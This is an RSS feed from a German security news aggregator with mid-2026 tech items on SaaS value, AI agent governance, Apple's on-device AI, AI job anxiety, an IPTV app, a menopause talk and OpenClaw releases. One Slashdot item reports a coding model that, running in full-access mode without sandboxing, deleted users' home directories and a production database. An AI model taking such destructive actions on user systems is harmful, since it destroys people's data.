<p class="wp-block-paragraph">The organizations getting this right are honest about where they create unique value. They focus development there, and partner for everything else. The ones getting it wrong are vibe-coding solutions to non-differentiating problems while their actual competitive moat goes unattended.</p>



<h2 class="wp-block-heading">The true value of software</h2>



<p class="wp-block-paragraph">We’re not watching the death of SaaS. We’re watching the end of the friction-based value proposition: the idea that software is worth renewing because integration used to be painful. That rationale is largely gone.</p>



<p class="wp-block-paragraph">What survives is software that does something customers cannot reasonably replicate internally: absorb risk, maintain regulatory compliance, deliver operational reliability at scale, and bring genuine domain expertise into a production-grade system that someone else already stress-tested for years.</p>



<p class="wp-block-paragraph">The vendors who recognize this are already repositioning around accountability, governance, and outcomes. The ones who haven’t will find the next renewal conversation noticeably harder.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability. That distinction is about to separate a lot of winners from a lot of cautionary tales.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.6.33]]></title>
<description><![CDATA[OpenClaw 2026.6.33]]></description>
<link>https://tsecurity.de/de/3683059/downloads/v2026633/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683059/downloads/v2026633/</guid>
<pubDate>Tue, 21 Jul 2026 10:47:19 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.6.33</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI confidence just dropped 17 points in six months. That’s actually great news.]]></title>
<description><![CDATA[Presented by JumpCloudThe organizations losing confidence in AI are the ones most likely to get it right.Six months ago, 40% of IT leaders described their organizations as mature in AI deployment. Today that number is 23%. Before you read that as a setback, consider what it actually reflects.We r...]]></description>
<link>https://tsecurity.de/de/3681607/it-nachrichten/ai-confidence-just-dropped-17-points-in-six-months-thats-actually-great-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681607/it-nachrichten/ai-confidence-just-dropped-17-points-in-six-months-thats-actually-great-news/</guid>
<pubDate>Mon, 20 Jul 2026 18:03:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by JumpCloud</i></p><hr><p><b><i>The organizations losing confidence in AI are the ones most likely to get it right.</i></b></p><p>Six months ago, 40% of IT leaders described their organizations as mature in AI deployment. <a href="https://jumpcloud.com/resources/q3-2026-it-trends-report?utm_source=VentureBeat&amp;utm_medium=Contributed&amp;utm_campaign=FY26Q1_MorningBrew_AD&amp;utm_content=JulyArticle"><u>Today that number is 23%</u></a>. Before you read that as a setback, consider what it actually reflects.</p><p>We recently surveyed 800 IT leaders across the U.S. and U.K. for our Q3 2026 trends report, and the data tells a consistent story: the organizations revising their self-assessment downward are overwhelmingly the ones that have moved AI agents from pilots into production. They’re not losing faith in AI. They’re running into the problems that only show up when agents are doing real work in real systems, and they’re being honest about what they found.</p><p>That kind of honesty is harder to come by than it sounds, and it matters more than the confidence number itself.</p><h2>Deployment was the easy part</h2><p>84% of organizations plan to expand AI use in IT operations over the next 6 to 24 months, so the drop in confidence isn’t a retreat. What it reflects is a more accurate picture of what production actually requires.</p><p>In a pilot, an AI agent does one thing in a controlled setting. In production, it accesses real systems, makes decisions that affect real workflows, and operates continuously, often without a human in the loop. The governance infrastructure that entails is materially different from what it took to get the pilot working. Most organizations built enough to ship. Fewer built enough to scale.</p><p>The IT leaders revising their self-assessment are confronting questions they didn’t have to ask at the pilot stage: Can we see every agent running in our environment? Do we know what each one can access? If an agent behaved unexpectedly last week, how long would it take to find out? For most organizations, at least one of those answers is uncomfortable.</p><h2>The gap between perception and reality is where risk accumulates</h2><p>The graphic above captures the structural problem. Across confidence, governance, and autonomy, the same pattern holds: deployment is moving faster than the controls built around it.</p><p>The organizations that have closed this gap share specific characteristics. They’ve consolidated their IT environments rather than adding tools to solve each new problem, because every additional platform creates another place where agent identity, access, and accountability can go unmanaged. They treat AI agents as governed identities rather than tolerated shadow processes. And they measure what AI actually produces, not just what it deploys.</p><p>The payoff is tangible. Organizations in the top tier of our maturity model are five times more likely to report no barriers to expanding their AI agents than the average organization. They are not more cautious about AI. They are more confident in it, because they built the foundation that makes confidence earned rather than assumed.</p><h2>The governance gap has a specific shape</h2><p>The hardest problem in enterprise AI right now is not capability. It is accountability, and the data makes the specific failure point clear: non-human identity governance is the least adopted AI security practice we measured, in place at just 21% of organizations.</p><p>Non-human identities now outnumber human users in 83% of organizations, and that population is growing fast. Yet most of those identities exist without the governance structures that every human employee has as a matter of course: no formal record, no named owner, no defined scope of access, no offboarding process when their purpose expires. They keep running. They keep accessing systems. They keep accumulating permissions. We call these Zombie Agents, and they are the service account problem of the AI era, operating at machine speed and in every department.</p><p>The accountability gap is where real risk lives. When a human employee takes an action, there is an implicit accountability chain. When an autonomous agent takes an action, that chain breaks unless it has been deliberately engineered. Most organizations have not yet engineered it, and the gap between the autonomy agents are being granted and the oversight structures in place to manage them is widening every month.</p><h2>What the confidence drop is actually telling us</h2><p>When AI maturity confidence was uniformly high across the market, that was worth worrying about. It meant most organizations hadn’t yet run into the hard parts. A selective drop, concentrated among organizations actively running agents in production, means the market is developing a more accurate picture of what AI operations genuinely require.</p><p>The organizations recalibrating are doing the work that makes long-term AI adoption possible: building identity infrastructure that covers agents alongside humans and devices, unifying the environments where governance needs to apply, and measuring outcomes rather than just counting deployments. They haven’t lowered their ambitions for AI. They have raised their standards for what it means to run it responsibly.</p><p>84% of organizations plan to expand AI use over the next two years. The ones that will do it well are honest enough, right now, to admit what they haven’t yet built.</p><p><i>JumpCloud’s Q3 2026 AI Readiness Research report (n=800 IT leaders, U.S. + U.K.) is available </i><a href="https://jumpcloud.com/resources/q3-2026-it-trends-report?utm_source=VentureBeat&amp;utm_medium=Contributed&amp;utm_campaign=FY26Q1_MorningBrew_AD&amp;utm_content=JulyArticle"><i><u>here</u></i></a><i>. The report covers AI agent deployment stages, identity governance gaps, IT unification benchmarks, and budget realism across mid-market and enterprise organizations.</i></p><p><i>Rajat Bhargava is CEO and Co-founder at JumpCloud.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent vs. OpenClaw: Open-Source-KI-Agenten im Vergleich]]></title>
<description><![CDATA[Hermes Agent und OpenClaw zeigen zwei unterschiedliche Wege, wie autonome KI-Agenten eingesetzt werden können: als lernende Entwicklerplattform oder als persönlicher Produktivitätsassistent. In diesem Vergleich erklären wir Architektur, Funktionen, Deployment und Zielgruppen von Hermes vs. OpenCl...]]></description>
<link>https://tsecurity.de/de/3681407/server/hermes-agent-vs-openclaw-open-source-ki-agenten-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681407/server/hermes-agent-vs-openclaw-open-source-ki-agenten-im-vergleich/</guid>
<pubDate>Mon, 20 Jul 2026 16:45:32 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/Hermes_Agent_vs._OpenClaw.png" width="1698" height="926" alt=""><br>Hermes Agent und OpenClaw zeigen zwei unterschiedliche Wege, wie autonome KI-Agenten eingesetzt werden können: als lernende Entwicklerplattform oder als persönlicher Produktivitätsassistent. In diesem Vergleich erklären wir Architektur, Funktionen, Deployment und Zielgruppen von Hermes vs. OpenClaw und helfen Ihnen, das passende Open-Source-Framework für Ihre Anforderungen auszuwählen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple could ‘run the table’ on AI if it does things right]]></title>
<description><![CDATA[Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.



Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to hel...]]></description>
<link>https://tsecurity.de/de/3681267/it-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681267/it-nachrichten/apple-could-run-the-table-on-ai-if-it-does-things-right/</guid>
<pubDate>Mon, 20 Jul 2026 15:33:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Looking ahead just a short time, Apple could hold a powerful position in AI where it most makes sense: deployment.</p>



<p class="wp-block-paragraph">Not only will the company offer up its own AI models for the kind of tasks millions use ChatGPT to do today, but it will provide more sophisticated on-device agentic models to help users get things done through Siri AI.</p>



<p class="wp-block-paragraph">Apple also <a href="https://www.macobserver.com/news/apple-calls-its-new-assistant-siri-ai-at-wwdc-2026-gemini-partnership-now-official/" target="_blank" rel="noreferrer noopener">offers limited capacity for more complex tasks</a> through <a href="https://www.applemust.com/apple-commences-us-manufacturing-of-private-cloud-compute-servers/" target="_blank" rel="noreferrer noopener">Private Cloud Compute</a>, and, in partnership with the likes of Google in the US and Alibaba in China, the company is giving users a trusted conduit through which to access even more sophisticated AI services. </p>



<h2 class="wp-block-heading"><strong>Deeply deployable</strong></h2>



<p class="wp-block-paragraph">Critics can say it <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">took Apple a long time</a> to get to this point, but they also seem to think the company has finally got the mix right with its series 27 operating systems. Arriving late to a party <a href="https://www.computerworld.com/article/4164979/apple-will-be-behind-on-ai-until-it-isnt.html">doesn’t mean you won’t shine once you get there</a>.</p>



<p class="wp-block-paragraph">Apple is also coming up the inside lane around frontier AI, with iterative OS and hardware enhancements that mean its devices become increasingly effective for <a href="https://www.computerworld.com/article/4016798/why-i-hope-apple-keeps-investing-in-on-device-ai.html">Edge AI use cases</a>, on device — no cloud service required.</p>



<p class="wp-block-paragraph">The company appears to be digging down into those use cases. Mark Gurman at Bloomberg recently predicted that <a href="https://www.tomshardware.com/tech-industry/semiconductors/apples-rumored-m7-ultra-targets-1-5tb-of-memory-and-blackwell-class-ai" target="_blank" rel="noreferrer noopener">future M7 Ultra Macs</a> will support as much as 1.5TB RAM, making these systems more than capable of running full weight frontier models in people’s offices, colleges, and homes. </p>



<p class="wp-block-paragraph">While that does assume the <a href="https://www.computerworld.com/article/4187825/the-trillion-dollar-ai-hallucination.html">AI-flationary memory market</a> can supply that much RAM at prices humans can afford, it is also true that people are already <a href="https://www.computerworld.com/article/4092162/apples-macos-ai-for-the-rest-of-us.html">running AI clusters</a> using off-the-shelf Mac minis networked over Thunderbolt cables. It’s no stretch to believe <a href="https://www.applemust.com/macweb-now-offers-mac-mini-cloud-clusters-in-east-coast-data-centre/" target="_blank" rel="noreferrer noopener">this will continue to be the case</a>, and that it will even broaden as the power/performance offered at the high end grows.</p>



<h2 class="wp-block-heading"><strong>What’s wrong with good enough?</strong></h2>



<p class="wp-block-paragraph">When combined with open AI stacks, particularly newly emerging varieties, Apple’s platforms should become leading contenders for <a href="https://www.computerworld.com/article/4074648/apples-big-bang-ai-moment-is-approaching.html">private AI services</a> and edge AI. Many business users will leap at the chance to offer their workers powerful, self-hosted, private AI services using one or more daisy-chained Mac Studios or Mac minis. The recent craze in deployment of both Macs to support <a href="https://openclaw.ai/" target="_blank" rel="noreferrer noopener">OpenClaw</a> instances shows they already are.</p>



<p class="wp-block-paragraph">Ultimately, these different slices of momentum mean I agree with <a href="https://podcastalpha.substack.com/p/all-in-can-ai-regulate-itself-stripe" target="_blank" rel="noreferrer noopener">investor Jason Calacanis</a> that Apple is in position to apply a great deal of pressure on OpenAI and Claude just by putting models on their devices. </p>



<p class="wp-block-paragraph">It’s also worth thinking about how people use AI today. How many of the queries made in the world right now constitute relatively simple tasks that could be transacted by on-device AI, such as the emerging new version of Apple Intelligence or even smaller LLM models running on device? You can even run <a href="https://9to5mac.com/2026/07/14/prismml-releases-bonsai-27b-claiming-first-major-ai-model-of-its-size-fit-for-iphone/" target="_blank" rel="noreferrer noopener">PrismML’s 1-bit, 27-billion parameter Bonsai</a> on an iPad using the Locally app, and that’s in the here and now.</p>



<p class="wp-block-paragraph">What happens? Pretty soon you’ll find people recognize that they can already run the vast majority of their AI-augmented workflows using services they <a href="https://www.applemust.com/morgan-stanley-its-when-not-if-apple-will-deliver-ai-on-the-edge/" target="_blank" rel="noreferrer noopener">have on their existing device</a> or can access on their on-prem Mac set-ups. And, of course, as people get used to running small tasks locally and larger tasks on premises, the actual space in which they need to turn to cloud-based frontier models <a href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html">will erode</a>. That’s even as companies like PrismML work towards slimming down full-weight models so they don’t need to run on a server at all. </p>



<p class="wp-block-paragraph">“It’s going to be wild when people have unlimited tokens on their desks,” said Calacanis in a podcast round table discussion.</p>



<h2 class="wp-block-heading"><strong>Who has the most to lose?</strong></h2>



<p class="wp-block-paragraph">The current incarnations of AI felt like they came from nowhere. Most people weren’t aware of the technology until returning to work after the 2022 holiday season. Since then, the industry has proliferated with dozens of competing models, most recently including powerful but affordable frontier models such as Qwen and Kimi.ai.</p>



<p class="wp-block-paragraph">These models aren’t necessarily all as good as one another, but in many cases for much of what we do, we’ll find them to be good enough. That’s an existential crisis for some, as industry observers now think the inevitable pricing pressure means some services might have over-invested in capacity before finding any way to turn a profit.</p>



<p class="wp-block-paragraph">Those profit-seeking services are the ones with the most to lose as Apple extends its hardware advantage, democratizing AI access for all while providing platforms suitable for edge AI, on-premises AI, private AI, and even AI access using third-party services. (The need for the latter will shrink as the capabilities of the former get better.)</p>



<h2 class="wp-block-heading"><strong>Cupertino rising</strong></h2>



<p class="wp-block-paragraph">What does this all mean? While the industry remains young, it is already fragmenting. And striding through the dust of that process comes Apple, equipped with the hardware, software, and approach to build its business even as the enterprise of first mover AI services erodes. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI job worries grow. But some human skills can’t be replaced by machines | Gaynor Parkin and Dave Winsborough]]></title>
<description><![CDATA[The fear of becoming obsolete is a rising source of anxiety as artificial intelligence emerges in the workplace. Staying strongly connected with others will helpThe modern mind is a column where experts discuss mental health issues they are seeing in their workEarlier this year Paul* discovered v...]]></description>
<link>https://tsecurity.de/de/3679650/ai-nachrichten/ai-job-worries-grow-but-some-human-skills-cant-be-replaced-by-machines-gaynor-parkin-and-dave-winsborough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679650/ai-nachrichten/ai-job-worries-grow-but-some-human-skills-cant-be-replaced-by-machines-gaynor-parkin-and-dave-winsborough/</guid>
<pubDate>Sun, 19 Jul 2026 17:03:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The fear of becoming obsolete is a rising source of anxiety as artificial intelligence emerges in the workplace. Staying strongly connected with others will help</p><ul><li><p><a href="https://www.theguardian.com/commentisfree/series/the-modern-mind">The modern mind</a> is a column where experts discuss mental health issues they are seeing in their work</p></li></ul><p>Earlier this year Paul* discovered via a flurry of media stories that his business group had been targeted for job cuts, alongside a number of other public sector agencies. For him, this was the second time, after his technical management role was restructured in 2024. While that process was difficult enough, the comms this time were highlighting the integration of AI as a cost-saving tool. “They say it’s not about firing people, but hey, my whole team will go.”</p><p>For Paul, the timing could not have been worse. He and his partner are expecting a child and recently purchased their first house.</p><p>Curiosity: Seek new learning, perspectives and interests, look outside your usual sources for inspiration. You can use AI to widen your perspective and spark ideas, but stay engaged with the world beyond the screen.</p><p>Humility: Grow your self-awareness. Reflect on what comes naturally, what energises you, and where you get stuck. Then invite honest feedback. AI learns through feedback – you can too. Ask people you trust what to start, stop and keep doing.</p><p>Emotional intelligence: Your ability to connect, show empathy and communicate with care will only become more valuable.</p> <a href="https://www.theguardian.com/commentisfree/2026/jul/20/ai-job-worries-human-skills-machines-cant-replace">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Menopause.exe:running_with_limited_resources "Hacking the Hormonal System Update" (emf2026)]]></title>
<description><![CDATA[Menopause is a hormone system update you didn’t ask for: no consent, no user manual, and no warning label. Once installed, it triggers a ripple effect across social, mental, physical, and work systems. Subtly rewriting routines and behaviors almost overnight. The system you once knew, which used ...]]></description>
<link>https://tsecurity.de/de/3679466/it-security-video/menopauseexerunningwithlimitedresources-hacking-the-hormonal-system-update-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679466/it-security-video/menopauseexerunningwithlimitedresources-hacking-the-hormonal-system-update-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 14:31:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Menopause is a hormone system update you didn’t ask for: no consent, no user manual, and no warning label. Once installed, it triggers a ripple effect across social, mental, physical, and work systems. Subtly rewriting routines and behaviors almost overnight. The system you once knew, which used to run seamlessly, now requires debugging, optimization, and at times a little creative patching.
Menopause affects over 1 billion individuals worldwide, yet it remains poorly understood. Despite its universal impact, it is shrouded in myths and a pervasive enforced silence, leaving many unprepared for the changes it brings. This presentation reframes menopause as a hormone system update, exploring how it can subtly, and sometimes dramatically alters life experiences. Viewed through the lens of anyone who has ever had to troubleshoot a stubborn, unpredictable system, this presentation examines how this important life transition and why understanding these changes matter for you and your community. 
My aim is to have an honest conversation about this topic that empowers you with self-advocacy.
Drawing on my own lived experience and as a certified menopause coach, this talk blends data, humor, and clear language to unpack what happens during menopause and why “just pushing through it” is not a viable workaround. I’ll highlight the latest stats, debug common myths, and reveal how menopause quietly affects your entire life.
We can’t roll back the update, but we can optimize the system.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/153-menopause-exe-running-with-limited-resources-hacking-the]]></content:encoded>
</item>
<item>
<title><![CDATA[Menopause.exe:running_with_limited_resources "Hacking the Hormonal System Update" (emf2026)]]></title>
<description><![CDATA[Menopause is a hormone system update you didn’t ask for: no consent, no user manual, and no warning label. Once installed, it triggers a ripple effect across social, mental, physical, and work systems. Subtly rewriting routines and behaviors almost overnight. The system you once knew, which used ...]]></description>
<link>https://tsecurity.de/de/3679424/it-security-video/menopauseexerunningwithlimitedresources-hacking-the-hormonal-system-update-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679424/it-security-video/menopauseexerunningwithlimitedresources-hacking-the-hormonal-system-update-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 14:03:18 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Menopause is a hormone system update you didn’t ask for: no consent, no user manual, and no warning label. Once installed, it triggers a ripple effect across social, mental, physical, and work systems. Subtly rewriting routines and behaviors almost overnight. The system you once knew, which used to run seamlessly, now requires debugging, optimization, and at times a little creative patching.
Menopause affects over 1 billion individuals worldwide, yet it remains poorly understood. Despite its universal impact, it is shrouded in myths and a pervasive enforced silence, leaving many unprepared for the changes it brings. This presentation reframes menopause as a hormone system update, exploring how it can subtly, and sometimes dramatically alters life experiences. Viewed through the lens of anyone who has ever had to troubleshoot a stubborn, unpredictable system, this presentation examines how this important life transition and why understanding these changes matter for you and your community. 
My aim is to have an honest conversation about this topic that empowers you with self-advocacy.
Drawing on my own lived experience and as a certified menopause coach, this talk blends data, humor, and clear language to unpack what happens during menopause and why “just pushing through it” is not a viable workaround. I’ll highlight the latest stats, debug common myths, and reveal how menopause quietly affects your entire life.
We can’t roll back the update, but we can optimize the system.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/153-menopause-exe-running-with-limited-resources-hacking-the]]></content:encoded>
</item>
<item>
<title><![CDATA[Fred TV Mobile 2.0: Ultra-Fast Open-Source IPTV app, now will full Android TV support and much more!]]></title>
<description><![CDATA[I've been working really hard those past 3 months to deliver what I can consider to be the best android IPTV app; fully open-source, intuitive, bloat-free and ultra-fast. Today, I release Fred TV 2.0 on the playstore! - Optimized to be the fastest IPTV app out there, with a fully re-written backe...]]></description>
<link>https://tsecurity.de/de/3678778/linux-tipps/fred-tv-mobile-20-ultra-fast-open-source-iptv-app-now-will-full-android-tv-support-and-much-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678778/linux-tipps/fred-tv-mobile-20-ultra-fast-open-source-iptv-app-now-will-full-android-tv-support-and-much-more/</guid>
<pubDate>Sun, 19 Jul 2026 04:54:42 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I've been working really hard those past 3 months to deliver what I can consider to be the best android IPTV app; fully open-source, intuitive, bloat-free and ultra-fast.</p> <p>Today, I release Fred TV 2.0 on the playstore!</p> <p>- Optimized to be the fastest IPTV app out there, with a fully re-written backend made in Rust.</p> <p>- Full Android TV support, D-Pad support on every view</p> <p>- New easy-to-use redesigned TV Home for Android TV</p> <p>- Robust playback, even on shoddy streams and on low-end devices</p> <p>- Full support for Xtream and M3U</p> <p>Try it out! You won't regret giving it a shot if you're already using other IPTV apps.</p> <p>If you had tried the app previously under 1.X.X, please try it again, 2.0 is a massive upgrade.</p> <p><a href="https://play.google.com/store/apps/details?id=dev.fredol.open_tv">https://play.google.com/store/apps/details?id=dev.fredol.open_tv</a></p> <p><a href="https://github.com/fredolx/fred-tv-mobile">https://github.com/fredolx/fred-tv-mobile</a></p> <p>--</p> <p>Now the reason I'm posting this <a href="https://www.reddit.com/r/linux">r/linux</a> is not just to promote the app for Android. I'm doing an experiment. As some of you may know already, I've released before <a href="https://flathub.org/en/apps/dev.fredol.open-tv">Fred TV</a> for Linux, it uses tauri and rust to deliver a great experience on Desktop. Since the tauri front-end is still a webview at the end of the day, it doesn't deliver the best wayland experience.</p> <p>So I'm inviting you to try <code>Fred TV Next</code> which should be a lot smoother. It's fully native, no webview. It's essentially the mobile app with a few tweaks. I'll be collecting feedback to see if this is going to be the future of Fred TV. You can grab the <code>.flatpak</code> in the releases and try it out today. The idea is to make one fully convergent IPTV app with shared favorites and sources between devices, and many other features.</p> <p>Some of you may use old PCs with linux as TV boxes rather than using chinese boxes. I'm all for the eco-friendly nature of re-using old PCs, so here's the thing; you can use Fred TV Next and toggle the 'Force TV Mode' setting. It will give you the same d-pad/tv remote friendly experience as on Android TV, but without the chinese spyware.</p> <p>EDIT: I'm a honest indie open-source dev making my apps solo, without any AI. I've been programming since 2019 professionally and in my own time. You can inspect my code, build it yourself. This app asks for 0 permissions and uses all the best security standards.</p> <p>I've been maintaining the original desktop app for years, I have 3000 stars on Github and I've received a lot of support from my supporters which I am very grateful for.</p> <p>I invite you to try out my app which I've originally made for my friends and family who were using borderline malware proprietary IPTV apps. I'm just putting out there for anyone who would prefer to use an open-source app which focuses on speed and a great search-based UX.</p> <p>You are free to try it or not. But please if you do not care about IPTV or my app, do not make hateful claims about me. Thank you</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Fredol"> /u/Fredol </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v01jw3/fred_tv_mobile_20_ultrafast_opensource_iptv_app/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v01jw3/fred_tv_mobile_20_ultrafast_opensource_iptv_app/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Acknowledges GPT-5.6 May Accidentally Delete Files, Calls It 'Honest Mistake']]></title>
<description><![CDATA["OpenAI has finally confirmed reports that its latest family of large language models can accidentally delete files," reports InfoWorld, "while stressing that such incidents are rare and should be viewed as 'honest mistakes.'"



Reports of the flagship LLMs deleting files emerged shortly after t...]]></description>
<link>https://tsecurity.de/de/3678730/it-security-nachrichten/openai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-honest-mistake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678730/it-security-nachrichten/openai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-honest-mistake/</guid>
<pubDate>Sun, 19 Jul 2026 03:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["OpenAI has finally confirmed reports that its latest family of large language models can accidentally delete files," reports InfoWorld, "while stressing that such incidents are rare and should be viewed as 'honest mistakes.'"



Reports of the flagship LLMs deleting files emerged shortly after the company launched them earlier this month, with investor Matt Shumer taking to X to report that GPT-5.6-Sol had "just accidentally deleted almost all" of his Mac's files. Just days later, software engineer Bruno Lemos posted on X that the same model had deleted his entire production database. In response to these incidents, the company's engineering lead for Codex, Thibault Sottiaux, wrote on X that internal investigations have revealed that these deletion incidents are more likely to happen when "full access mode is enabled, and Codex is run without sandboxing protections, including without auto review being enabled." In cases where full access mode is granted, the model, Sottiaux wrote, "attempts to override the $HOME env var to define a temporary directory. The model makes an honest mistake and mistakenly deletes $HOME instead...." 



The company, however, according to Sottiaux, is taking steps to mitigate the risk. "This is of course not how we want the system to behave, even when a user operates the model in full-access mode without the safeguards of our sandbox or without using auto review which checks for these kinds of high risk actions and rejects them," the engineering lead wrote on X. "We are taking steps to mitigate this risk, including by updating the developer message, guiding more users towards safer permission modes, and adding additional harness safeguards," Sottiaux added, noting that a detailed post-mortem outlining the root cause of the issue and the additional mitigation measures being implemented is expected to follow in the coming days, despite emphasizing that such incidents happen "extremely rarely."



<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OpenAI+Acknowledges+GPT-5.6+May+Accidentally+Delete+Files%2C+Calls+It+'Honest+Mistake'%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F19%2F0129228%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F19%2F0129228%2Fopenai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-honest-mistake%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/19/0129228/openai-acknowledges-gpt-56-may-accidentally-delete-files-calls-it-honest-mistake?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.2-beta.3]]></title>
<description><![CDATA[OpenClaw 2026.7.2-beta.3]]></description>
<link>https://tsecurity.de/de/3678509/downloads/v202672-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678509/downloads/v202672-beta3/</guid>
<pubDate>Sat, 18 Jul 2026 22:46:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.2-beta.3</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[eCPPTv3 Review]]></title>
<description><![CDATA[Almost a year ago, I took the INE’s “eCPPTv3” exam, and here is my honest reviewWhy eCPPT?A year ago (May 29) I’ve bought the bundle which included 3 months of premium subscription and 2 exam attempts, thankfully a single attempt was enough for me. Back then I wasn’t really familiar with HackTheB...]]></description>
<link>https://tsecurity.de/de/3677786/hacking/ecpptv3-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677786/hacking/ecpptv3-review/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
